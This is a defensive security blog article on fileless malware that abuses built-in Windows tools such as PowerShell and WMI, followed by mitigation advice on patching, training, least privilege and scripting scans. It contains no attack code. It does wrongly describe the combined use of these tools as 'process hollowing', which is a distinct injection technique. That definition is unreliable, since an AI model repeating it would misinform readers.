April 17, 2019 By David Strom 4 min read

The threat of fileless malware and its potential to harm enterprises is growing.

Fileless malware leverages what threat actors call “living off the land,” meaning the malware uses code that already exists on the average Windows computer. When you think about the modern Windows setup, this is a lot of code: PowerShell, Windows Management Instrumentation (WMI), Visual Basic (VB), Windows Registry keys that have actionable data, the .NET framework, etc. Malware doesn’t have to drop a file to use these programs for bad intentions.

The combination of all of these code sources is generally called process hollowing — a tactic in which malware uses a particular process as a storage container and distribution mechanism for its code. One recent attack discovered by FireEye combined PowerShell, VB scripts and .NET in a single lethal package.

Attacks leveraging PowerShell are particularly on the rise. Last fall, IBM X-Force Incident Response and Intelligence Services (IRIS) demonstrated just how potent PowerShell-based exploits can be, since code is executed directly from a PC’s memory. Plus, PowerShell can be used for remote access attacks and get around application whitelisting protections.

Given this growing threat, what can security teams do to help defend their organizations against fileless malware?

Ensure Strong Companywide Security Hygiene

The general thrust of how to combat fileless malware begins with making sure your Windows computers are patched and up to date. Since one of the first tenets of threat actors is taking advantage of unpatched, older systems, to delay patch management is to introduce a vulnerability into your network. The spread of EternalBlue illustrated this well; the patch was available for more than a month before the exploit was launched.

The next step is to ensure you have a solid security awareness training regimen. This doesn’t mean running annual exercises or sending out the occasional test phishing email. Instead, come up with a program that operates continuously and is always making users aware of the dangers of email attachments and clicking on links willy-nilly. Most fileless campaigns begin their life with a simple phishing email, so it is important to try to nip these entry points quickly.

Third is to understand the behavior of built-in Windows code so you can spot anomalies, such as when encrypted PowerShell scripts are installed to run as a service. The combination of the two — the encryption and the service feature — should be a red flag. Analysts sometimes see compression tools instead of or in addition to encryption as well. Another red flag is finding a PowerShell script hiding in the \TEMP directory; while not technically fileless, this code quickly moves to more dangerous parts of the operating system (OS).

Understand Your Access Rights and Privileges

Organizations should understand what happens when fileless malware first detonates. Just because you have a user who clicked on a malicious attachment doesn’t mean the malware will stay on their PC. Instead, a typical behavior is for the malware to move across your network to find a richer target, such as a domain controller or web server. To prevent this, you should segment your network carefully and make sure you understand access rights, especially for third-party applications and users.

A common attack method is escalating privileges as malware moves around the network, which can be done using PowerShell, for example. They don’t call it PowerShell for nothing: An actor can issue commands for reverse Domain Name System (DNS) queries, enumerate access control lists on any network share and find members of a particular domain group. This means one of the more basic controls for any malware is to restrict administrator rights to the minimum number of systems.

Many fileless exploits count on the profligate use of rights that aren’t needed or are attached to users that have since left the company, or outdated rights for users who don’t access the targeted applications anymore. Companies should develop methods to detect when these situations occur and be able to shut them down quickly. Organizations should also disable Windows programs that aren’t needed. Not everyone needs PowerShell running on their computer, or support for the .NET framework. Even more effective is to eliminate support for ancient protocols such as SMBv1, which was what caused all the trouble with WannaCry.

Finally, while PowerShell can get around application whitelisting, it is still a good idea to deploy such controls. The more you know about how your users consume applications, the more likely you will be able to catch a piece of malware doing something that no other legit app has been observed doing. Another way is to disable macros, including Office macros, which are often abused by malware writers, although this isn’t a universal solution because many users do need them to do their jobs.

As a side note, Windows can be used for more than just desktop computers, and threat actors will sometimes target embedded Windows point-of-sale (POS) machines. The attraction here is that these computers have direct access to payment card data, so having extra protection for this population is crucial.

Combat Fileless Malware Threats With Careful Coordination

Microsoft hasn’t been standing still while fileless attacks run rampant. In fact, the company has developed an open interface called Antimalware Scan Interface that some vendors have begun using to make it easier to detect the “tells” of the fileless world, especially when it comes to analyzing scripting behavior.

In addition, anyone who wants to gain a better understanding of fileless attacks should check out the open source project AltFS. This is a complete fileless virtual file system to demonstrate how these techniques work, and it can be deployed on Windows and Mac PCs.

As you can see, fighting fileless malware attacks will take some serious effort and careful coordination among a variety of tools and techniques. With more unpredictable malware threats on the horizon, organizations should take steps today to strengthen their defenses.

More from Endpoint

Unified endpoint management for purpose-based devices

4 min read - As purpose-built devices become increasingly common, the challenges associated with their unique management and security needs are becoming clear. What are purpose-built devices? Most fall under the category of rugged IoT devices typically used outside of an office environment and which often run on a different operating system than typical office devices. Examples include ruggedized tablets and smartphones, handheld scanners and kiosks. Many different industries are utilizing purpose-built devices, including travel and transportation, retail, warehouse and distribution, manufacturing (including automotive)…

Virtual credit card fraud: An old scam reinvented

3 min read - In today's rapidly evolving financial landscape, as banks continue to broaden their range of services and embrace innovative technologies, they find themselves at the forefront of a dual-edged sword. While these advancements promise greater convenience and accessibility for customers, they also inadvertently expose the financial industry to an ever-shifting spectrum of emerging fraud trends. This delicate balance between new offerings and security controls is a key part of the modern banking challenges. In this blog, we explore such an example.…

Endpoint security in the cloud: What you need to know

9 min read - Cloud security is a buzzword in the world of technology these days — but not without good reason. Endpoint security is now one of the major concerns for businesses across the world. With ever-increasing incidents of data thefts and security breaches, it has become essential for companies to use efficient endpoint security for all their endpoints to prevent any loss of data. Security breaches can lead to billions of dollars worth of loss, not to mention the negative press in…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today